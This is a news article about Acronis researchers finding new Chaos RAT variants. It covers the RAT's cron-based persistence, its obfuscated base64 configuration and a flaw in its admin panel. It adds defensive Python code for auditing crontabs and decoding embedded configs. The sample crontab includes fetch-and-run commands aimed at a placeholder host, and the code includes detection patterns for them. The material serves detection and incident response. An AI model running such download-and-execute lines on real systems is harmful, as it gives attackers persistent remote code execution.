Acronis Threat Research Unit Finds New Chaos RAT Variants Targeting Linux, Windows

Chaos RAT, a remote management tool originally on GitHub, has been weaponized by threat actors for stealthy real-world cyberattacks.

SMEStreet Edit Desk

Acronis Threat Research Unit (TRU) has uncovered newly evolved variants of Chaos RAT, a once-legitimate open-source remote administration tool that is now actively leveraged in malicious campaigns targeting Linux and Windows systems. First observed in 2022 and initially built as a cross-platform management utility, it has increasingly drawn the interest of cybercriminals due to its flexibility, low detection footprint, and open-source accessibility.

Originally designed and distributed on GitHub as a remote management tool written in Golang, Chaos RAT has been weaponized by threat actors who are using it in stealthy, real-world attacks. The latest samples, discovered in 2025, demonstrate the tool’s ongoing evolution, with expanded compatibility, obfuscation techniques, and operational stealth. While its usage remains relatively limited compared to other malware families, its ability to bypass detection and maintain persistent access has made it a tool of choice for espionage, data exfiltration, and post-exploitation operations, including ransomware deployment.

Acronis TRU researchers have also discovered a critical vulnerability in Chaos RAT’s web-based administration panel that allows attackers to execute remote code on the server hosting the panel itself. Although this flaw doesn’t directly impact the victim machines, it highlights the insecure design practices behind the tool and could potentially allow attackers to hijack control from other operators. This vulnerability exemplifies the growing risks of open-source software in cybercrime supply chains.

In the latest sample, spotted on VirusTotal and submitted from India, a tar.gz-compressed archive named NetworkAnalyzer.tar.gz contained the final Chaos RAT payload. There is no additional information on how the victim received this package, but the available evidence points to a lure attempting to convince them to download a network troubleshooting utility for Linux environments.

Chaos RAT typically reaches victims via phishing emails or compromised websites, with early campaigns deploying malicious scripts that modified files to install a cron job, a common persistence mechanism in Unix-like systems. By embedding a cron job that fetches payloads remotely, attackers can update the malware without re-infecting the host. This approach was notably used in earlier attacks to deliver cryptocurrency miners alongside the RAT, suggesting reconnaissance or foothold establishment as the malware's primary purpose.
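The cron-based persistence described above leaves a concrete trace in crontab files: a scheduled entry that downloads from a remote URL and executes what it fetched. The following audit helper is an added example written for this article, not code from Acronis or from the Chaos RAT project. It parses crontab-style text, flags entries that combine a download tool with a remote URL, a pipe into an interpreter or a chmod-and-run pattern, or an `@reboot` schedule, and returns the findings so a responder can triage them. The crontab content and the `placeholder.invalid` URL are constructed for the example.

```python
import re
from dataclasses import dataclass, field

# Constructed sample crontab content (not from the report); the URL is a placeholder.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
*/5 * * * * curl -fsSL http://placeholder.invalid/update.sh | sh
@reboot wget -q -O /tmp/.na http://placeholder.invalid/na && chmod +x /tmp/.na && /tmp/.na
30 1 * * 0 /usr/local/bin/backup.sh
"""

# Heuristics: a download tool, a remote URL, and a sink that executes fetched content.
FETCH_TOOLS = re.compile(r"\b(curl|wget|fetch)\b")
REMOTE_URL = re.compile(r"\b(https?|ftp)://\S+")
EXEC_SINK = re.compile(r"(\|\s*(sh|bash|python3?|perl)\b|chmod\s+\+x|&&\s*/tmp/|/dev/shm/)")


@dataclass
class Finding:
    line_no: int
    schedule: str
    command: str
    reasons: list = field(default_factory=list)


def parse_crontab(text):
    """Yield (line_no, schedule, command) for each non-comment crontab entry."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            # Special schedules such as @reboot or @hourly: one token, then the command.
            schedule, _, command = line.partition(" ")
        else:
            # Standard five-field schedule followed by the command.
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            schedule, command = " ".join(parts[:5]), parts[5]
        yield line_no, schedule, command.strip()


def find_remote_fetch_jobs(text):
    """Return Finding objects for crontab entries that look like remote payload loaders."""
    findings = []
    for line_no, schedule, command in parse_crontab(text):
        reasons = []
        if FETCH_TOOLS.search(command) and REMOTE_URL.search(command):
            reasons.append("downloads from a remote URL")
        if EXEC_SINK.search(command):
            reasons.append("executes downloaded content")
        if schedule == "@reboot":
            reasons.append("runs at every boot")
        if reasons:
            findings.append(Finding(line_no, schedule, command, reasons))
    return findings


if __name__ == "__main__":
    for f in find_remote_fetch_jobs(SAMPLE_CRONTAB):
        print(f"line {f.line_no} [{f.schedule}] {f.command}\n    -> {', '.join(f.reasons)}")
```

On a live host the same function can be fed the output of `crontab -l` for each user plus the contents of `/etc/crontab` and `/etc/cron.d/*`; a download-and-execute entry on a short interval is the pattern to prioritise, since it is what lets an operator swap the payload without touching the host again.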

Notably, older Chaos RAT versions stored configuration data such as IP addresses and ports in plain text, whereas the newer variant encapsulates all data in a single base64-encoded string with an additional decoding function, a clear attempt to hinder reverse engineering and forensic analysis.
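Because the newer variant hides its server address and port inside one base64 string rather than plain text, a quick `strings` pass no longer surfaces the C2 details. The helper below is an added example for this article, not code from Acronis or from Chaos RAT, and it makes no claim about the real layout of the tool's configuration: it scans a binary blob for long base64-alphabet runs, decodes each candidate, keeps only those that decode to printable text, and extracts IPv4 addresses, ports and URLs from the result. The sample blob, the JSON-shaped configuration and the TEST-NET address `192.0.2.10` are all constructed for the example.

```python
import base64
import binascii
import json
import re

# Constructed stand-in for an embedded configuration; the real format is not known from the article.
CONSTRUCTED_CONFIG = json.dumps({"address": "192.0.2.10:8080", "token": "placeholder-token"})
# Constructed binary blob: ELF-like header bytes, filler, the base64 config, more filler.
SAMPLE_BLOB = (
    b"\x7fELF\x00\x00junk\x00"
    + base64.b64encode(CONSTRUCTED_CONFIG.encode())
    + b"\x00moreText12345\x00\x00"
)

B64_RUN = re.compile(rb"[A-Za-z0-9+/]{24,}={0,2}")
IPV4_PORT = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})(?::(\d{1,5}))?\b")
URL = re.compile(r"\b(?:https?|wss?)://[^\s\"']+")


def _decode_candidate(run):
    """Base64-decode a run, tolerating missing padding; return text or None if not printable."""
    padded = run + b"=" * (-len(run) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not raw:
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text


def extract_embedded_configs(blob):
    """Return decoded base64 candidates that contain network indicators (hosts or URLs)."""
    results = []
    for match in B64_RUN.finditer(blob):
        text = _decode_candidate(match.group(0))
        if text is None:
            continue
        hosts = [f"{ip}:{port}" if port else ip for ip, port in IPV4_PORT.findall(text)]
        urls = URL.findall(text)
        if not (hosts or urls):
            continue
        results.append({"offset": match.start(), "decoded": text, "hosts": hosts, "urls": urls})
    return results


if __name__ == "__main__":
    for hit in extract_embedded_configs(SAMPLE_BLOB):
        print(f"offset {hit['offset']}: hosts={hit['hosts']} urls={hit['urls']}")
        print("  decoded:", hit["decoded"])
```

Go binaries pack string constants back to back without terminators, so on a real sample the base64 run may be glued to neighbouring text; if a candidate fails to decode, trimming characters from either end until it does is the usual next step. Indicators recovered this way should be treated as leads to confirm against network telemetry, not as verified infrastructure.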
